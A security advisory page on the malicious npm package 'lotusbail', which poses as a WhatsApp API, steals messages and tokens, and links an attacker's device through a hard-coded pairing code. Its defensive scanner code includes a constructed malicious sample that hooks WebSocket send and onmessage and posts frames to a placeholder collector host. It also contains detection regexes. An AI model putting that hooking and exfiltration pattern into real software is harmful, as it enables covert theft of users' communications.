
Fake WhatsApp API Package on npm Steals Messages, Contacts, and Login Tokens

Severity: Medium
Tags: Vulnerability, RCE
Published: Mon Dec 22 2025 (12/22/2025, 16:28:00 UTC)
Source: The Hacker News

Description

Cybersecurity researchers have disclosed details of a new malicious package on the npm repository that works as a fully functional WhatsApp API, but also contains the ability to intercept every message and link the attacker's device to a victim's WhatsApp account. The package, named "lotusbail," has been downloaded over 56,000 times since it was first uploaded to the registry by a user named "

AI-Powered Analysis

Last updated: 12/22/2025, 18:24:11 UTC

Technical Analysis

The package, "lotusbail", presents itself as a drop-in WhatsApp API library and trades on the popularity of the @whiskeysockets/baileys TypeScript library to look functional and trustworthy. It was uploaded in May 2025 and has been downloaded more than 56,000 times. It does work as a WhatsApp API, but it wraps the WebSocket client used for WhatsApp Web communication, so every message, contact, media file and authentication token that passes through the client is captured in real time and exfiltrated, in encrypted form, to a server the attacker controls.

The more durable part of the compromise is a hard-coded pairing code. During authentication the package links the attacker's device to the victim's WhatsApp account as an additional linked device, which gives the attacker ongoing access to the account's conversations and contacts. Because that link is account state held by WhatsApp rather than anything in the project, it survives uninstalling the package; it ends only when the device is removed from the account's Linked Devices list in WhatsApp settings. The package also carries anti-debugging measures, such as infinite-loop traps, that stall analysis tooling.

The attack relies on developer trust in npm packages. Since lotusbail genuinely delivers the advertised functionality, a functional test, a download count or a reputation check finds nothing wrong, and static analysis that looks only for known-bad patterns can miss it: the malicious behaviour sits in how the library handles traffic it is legitimately expected to see. The targets are developers who add WhatsApp API functionality to their applications, and through them the WhatsApp accounts and data of end users. The incident illustrates the wider supply-chain problem in open-source ecosystems, where malicious code can ship inside widely used libraries and evade conventional controls.
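The three behaviours described above (a wrapped WebSocket that forwards traffic elsewhere, a pairing code fixed at build time, and an empty-loop anti-debug trap) can be looked for in a package's source before it is adopted. The following is an added example written for this page, not code from the article or from the lotusbail package: the regexes are assumptions about how such code tends to look, the WhatsApp host allowlist is an assumption, and both input samples are constructed for the demonstration.

```javascript
// Added example (not code from the article or from the lotusbail package): a
// static indicator scan for the three behaviours the analysis describes in a
// WhatsApp API wrapper. The patterns are assumptions about how such code tends
// to look, not signatures extracted from the real package.

// Hosts a WhatsApp client legitimately talks to (assumed allowlist).
const WHATSAPP_HOSTS = /(^|\.)whatsapp\.(net|com)$/i;

const INDICATORS = [
  {
    id: 'hardcoded-pairing-code',
    // Assumed shape: a pairing/link call whose arguments include an 8-character
    // alphanumeric literal, i.e. the device to be linked is chosen at build time.
    re: /(?:[Pp]airing|[Pp]air[Dd]evice|[Ll]ink[Dd]evice)\w*\s*\([^)]*['"][A-Z0-9]{8}['"]/,
  },
  {
    id: 'websocket-wrapped',
    // send/onmessage reassigned on a socket instance or on the prototype: the
    // hook sees every frame after the client decrypts it and before it is sent.
    re: /WebSocket\.prototype\.(?:send|onmessage)|\.(?:send|onmessage)\s*=\s*(?:function|async|\()/,
  },
  {
    id: 'infinite-loop-trap',
    // An empty busy loop; a common anti-debugging trap.
    re: /while\s*\(\s*(?:true|1)\s*\)\s*\{\s*\}|for\s*\(\s*;\s*;\s*\)\s*\{\s*\}/,
  },
];

// URL literals whose host is not a WhatsApp host: candidate exfiltration targets.
function extractForeignHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/\b(?:https?|wss?):\/\/([A-Za-z0-9.-]+)/g)) {
    if (!WHATSAPP_HOSTS.test(m[1])) hosts.add(m[1].toLowerCase());
  }
  return [...hosts].sort();
}

function scanPackageSource(source) {
  const indicators = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
  const foreignHosts = extractForeignHosts(source);
  // A wrapped socket is only damning when the code also has somewhere foreign
  // to send the captured frames; a hard-coded pairing code is damning on its own.
  const exfilPath = indicators.includes('websocket-wrapped') && foreignHosts.length > 0;
  const verdict = indicators.includes('hardcoded-pairing-code') || exfilPath ? 'suspicious' : 'clean';
  return { verdict, indicators, foreignHosts };
}

// Constructed sample 1: a benign wrapper. The pairing code is derived from the
// operator's phone number at runtime and the only endpoint is WhatsApp's.
const BENIGN_SAMPLE = `
const ws = new WebSocket('wss://web.whatsapp.com/ws/chat');
if (!sock.authState.creds.registered) {
  const code = await sock.requestPairingCode(process.env.WA_PHONE);
  console.log('enter this code in WhatsApp > Linked Devices:', code);
}
`;

// Constructed sample 2: the pattern the analysis describes. send/onmessage are
// hooked to tee frames to a foreign host, the pairing call carries a literal
// code, and an empty loop is triggered when an inspector is attached.
const MALICIOUS_SAMPLE = `
const SINK = 'https://api.example-collector.test/ingest';
const ws = new WebSocket('wss://web.whatsapp.com/ws/chat');
const realSend = ws.send;
ws.send = function (frame) {
  fetch(SINK, { method: 'POST', body: frame });
  return realSend.call(this, frame);
};
ws.onmessage = (ev) => fetch(SINK, { method: 'POST', body: ev.data });
if (!sock.authState.creds.registered) {
  await sock.requestPairingCode(phone, 'ABCD1234');
}
setInterval(() => { if (inspectorAttached()) { while (true) {} } }, 1000);
`;

console.log(JSON.stringify(scanPackageSource(BENIGN_SAMPLE)));
console.log(JSON.stringify(scanPackageSource(MALICIOUS_SAMPLE)));
```

The verdict rule is deliberately conjunctive for the transport hook: a library that reassigns `send` to add logging or retries is common and benign, so the hook only counts when paired with a foreign URL literal. A hard-coded pairing code has no legitimate reason to exist and is flagged on its own.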

Potential Impact

For European organizations the impact can be significant, particularly where WhatsApp carries business communications or WhatsApp APIs are built into applications. Confidentiality is the primary loss: the attacker can read private messages, contact lists, media and documents, which amounts to a personal-data breach under GDPR. Integrity is affected because a linked device can act as the account, so the attacker can send messages as the user or alter the course of conversations. Availability is at most an indirect concern, for example if the attacker's activity leads to an account lockout. Because the device link persists after the package is removed, the access lends itself to long-running espionage and data exfiltration. Sectors that use WhatsApp for sensitive exchanges, such as finance, legal, healthcare and government, face the greatest exposure, and European developers risk shipping the compromised dependency inside their own products. The episode also erodes trust in open-source ecosystems, with reputational and operational consequences. Given that the package was still available and still being downloaded at the time of publication, the threat remains current.

Mitigation Recommendations

European organizations should apply several layers of mitigation:

1) Vet third-party npm packages before adoption: confirm the publisher and the package's relationship to the library it claims to be (lotusbail is not a release of @whiskeysockets/baileys), and complement static scanning with dynamic analysis, since a package that works as advertised passes a functional test.
2) Check the Linked Devices list (WhatsApp Settings > Linked Devices) on any account used with an integration, remove devices nobody recognises, and make sure users know that uninstalling the package does not undo an attacker's device link.
3) Use runtime application self-protection (RASP) and behavioural monitoring to catch anomalous WebSocket traffic or data leaving the WhatsApp integration.
4) Use dependency tooling with supply-chain features: lockfiles with integrity hashes, provenance attestations and registry signatures (npm audit signatures checks both), and vulnerability alerts.
5) Standardise on official or well-reviewed WhatsApp API libraries and reject unverified look-alikes.
6) Subscribe to threat-intelligence feeds on malicious packages so known-bad names can be blocked at the registry proxy or in CI.
7) Train developers regularly on supply-chain risk and secure coding practices.
8) Report malicious packages to npm and other registry maintainers to speed their removal.
9) Restrict egress from hosts running the integration: a WhatsApp client only needs to reach WhatsApp endpoints, so any other outbound connection from that process is a signal worth blocking or alerting on.
10) Apply zero-trust principles to internal communications and API integrations to limit what a compromised integration can reach.
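Items 1, 4 and 5 above can be enforced mechanically against the project's lockfile. The following is an added example written for this page, not tooling from the article or from any vendor: it reads an npm package-lock.json (lockfileVersion 2 or 3), reports packages on a known-bad list, packages not resolved from the expected registry or lacking an integrity hash, and package names that share a distinctive fragment with an approved WhatsApp library without being that library. The approved list, registry URL and fragment length are assumptions, and the lockfile it runs on is constructed.

```javascript
// Added example (not the article's or any vendor's tooling): a dependency-policy
// check over an npm package-lock.json (lockfileVersion 2 or 3, "packages" map).
// The registry URL, the approved list and the fragment length are assumptions
// for the example; the lockfile at the bottom is constructed.

const APPROVED = ['@whiskeysockets/baileys'];   // libraries the team has vetted
const KNOWN_BAD = ['lotusbail'];                 // named in the article
const REGISTRY = 'https://registry.npmjs.org/';
const MIN_FRAGMENT = 4;

// "@scope/name" -> "name"
function baseName(pkg) {
  return pkg.replace(/^@[^/]+\//, '').toLowerCase();
}

// All substrings of length >= MIN_FRAGMENT of a name ("baileys" yields "bail",
// "aile", "baile", ...), used to catch look-alikes that edit distance would miss:
// "lotusbail" is far from "baileys" by edit distance but shares "bail".
function fragments(name) {
  const out = new Set();
  for (let len = MIN_FRAGMENT; len <= name.length; len++) {
    for (let i = 0; i + len <= name.length; i++) out.add(name.slice(i, i + len));
  }
  return out;
}

// Returns the approved package a name resembles, or null.
function lookAlikeOf(name) {
  if (APPROVED.includes(name)) return null;
  const base = baseName(name);
  for (const approved of APPROVED) {
    for (const frag of fragments(baseName(approved))) {
      if (base.includes(frag)) return approved;
    }
  }
  return null;
}

function vetLockfile(lockJson) {
  const lock = JSON.parse(lockJson);
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue;                            // the project itself
    const name = entry.name || path.replace(/^.*node_modules\//, '');
    if (KNOWN_BAD.includes(name)) findings.push({ name, rule: 'known-bad' });
    const twin = lookAlikeOf(name);
    if (twin) findings.push({ name, rule: 'look-alike', of: twin });
    if (!entry.resolved || !entry.resolved.startsWith(REGISTRY)) {
      findings.push({ name, rule: 'unexpected-source', resolved: entry.resolved || null });
    }
    if (!entry.integrity) findings.push({ name, rule: 'missing-integrity' });
  }
  return findings;
}

// Constructed lockfile: one vetted library, the look-alike from the article, and
// a dependency pinned to a git fork. Versions and integrity values are placeholders.
const SAMPLE_LOCK = JSON.stringify({
  name: 'wa-bot',
  lockfileVersion: 3,
  packages: {
    '': { name: 'wa-bot', dependencies: { '@whiskeysockets/baileys': '*', lotusbail: '*', pino: '*' } },
    'node_modules/@whiskeysockets/baileys': {
      version: '0.0.0',
      resolved: 'https://registry.npmjs.org/@whiskeysockets/baileys/-/baileys-0.0.0.tgz',
      integrity: 'sha512-PLACEHOLDER',
    },
    'node_modules/lotusbail': {
      version: '0.0.0',
      resolved: 'https://registry.npmjs.org/lotusbail/-/lotusbail-0.0.0.tgz',
      integrity: 'sha512-PLACEHOLDER',
    },
    'node_modules/pino': { version: '0.0.0', resolved: 'git+ssh://git@example.test/fork/pino.git' },
  },
});

console.log(JSON.stringify(vetLockfile(SAMPLE_LOCK), null, 2));
```

Run in CI, a non-empty findings list fails the build; the look-alike rule is the one that would have surfaced lotusbail next to the approved library even before the package was publicly reported, while the source and integrity rules catch dependencies that bypass the registry's signature and provenance checks entirely.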


Technical Details

Article Source: https://thehackernews.com/2025/12/fake-whatsapp-api-package-on-npm-steals.html (fetched 2025-12-22T18:23:53Z, 1340 words)

Threat ID: 69498cbc5b5b68b8f5deea6a

Added to database: 12/22/2025, 6:23:56 PM

Last enriched: 12/22/2025, 6:24:11 PM

Last updated: 12/26/2025, 6:49:55 PM

Views: 67

